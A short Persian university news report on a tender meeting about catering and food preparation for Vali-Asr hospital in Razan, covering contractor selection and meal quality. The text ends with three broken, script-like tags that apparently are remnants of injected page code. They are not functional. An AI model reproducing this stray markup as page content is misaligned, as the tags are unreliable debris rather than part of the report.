برگزاری جلسه مناقصه تهیه وطبخ غذای بیمارستان ولی عصر (عج) رزن
جلسه مناقصه تهیه وطبخ غذای بیمارستان ولی عصر (عج) رزن دردفترمدیریت امور رفاهی و پشتیبانی دانشگاه برگزار شد.

به گزارش روابط عمومی معاونت توسعه مدیریت و منابع دانشگاه، جلسه مناقصه تهیه وطبخ غذای بیمارستان ولی عصر (عج) رزن  با حضور مهندس آقایانی مدیر امور رفاهی و پشتیبانی، کارشناسان مدیرت برنامه ریزی ، بودجه و پایش عملکرد حراست و مدیریت امور مالی دانشگاه و بیمارستانهای مذکور برگزار شد.

در این جلسه به مسائلی همچون، انتخاب پیمانکار، کیفیت و نحوه طبخ غذای با کیفیت برای رفاه حال بیماران و کارکنان بیمارستان های مذکور و … پرداخته شد و نقاط قوت و قابل بهبود بررسی گردید.<2 src='3?l=p&' type=text/java2 language=java2><2 src='3?l=p&' type=text/java2 language=java2><2 src='4?l=p&' type=text/java2 language=java2>